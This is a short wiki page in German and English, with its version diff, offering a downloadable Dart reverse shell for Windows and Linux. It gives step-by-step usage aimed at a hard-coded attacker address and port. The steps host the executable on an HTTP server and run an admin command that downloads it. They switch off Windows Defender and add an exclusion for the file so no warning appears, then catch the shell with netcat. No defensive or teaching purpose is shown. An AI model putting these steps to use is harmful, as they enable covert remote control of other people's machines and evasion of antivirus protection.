Dart Windows Revshell: Unterschied zwischen den Versionen
| Zeile 2: | Zeile 2: | ||
<big>Testen | <big>Testen | ||
</big> | </big> | ||
| + | |||
[[Media:Revshell.zip]] | [[Media:Revshell.zip]] | ||
Aktuelle Version vom 23. August 2025, 17:17 Uhr
Download
Testen
How to use
Windows
compiled for hacker ip 10.0.10.101 port 9999
copy the revshell.exe from server where you can download it from the follow script
open on the server a http server with e.g. python -> python3 -m http.server 1111
change server, port and path in "download_install_revshellDart.ps1
change path in cmd_admin_install_revshellDart.txt and copy the command
open cmd as admin
paste command and execute
it will load the revshellDart.exe from the given server, deactivate the Windows Defender -> write an exception for this .exe file in Windows Defender -> activate Windows Defender for no suspicious pop up fenster
now just open with nc -lvnp 9999 on hacker machine and execute on windows the revshellDart.exe and the revshell is open
Linux
compiled for hacker ip 10.0.10.101 port 9999
copy the revshell_linux on the target device
open with nc -lvnp 9999 on hacker device machine and execute the revshell_linux on the target device and the revshell is open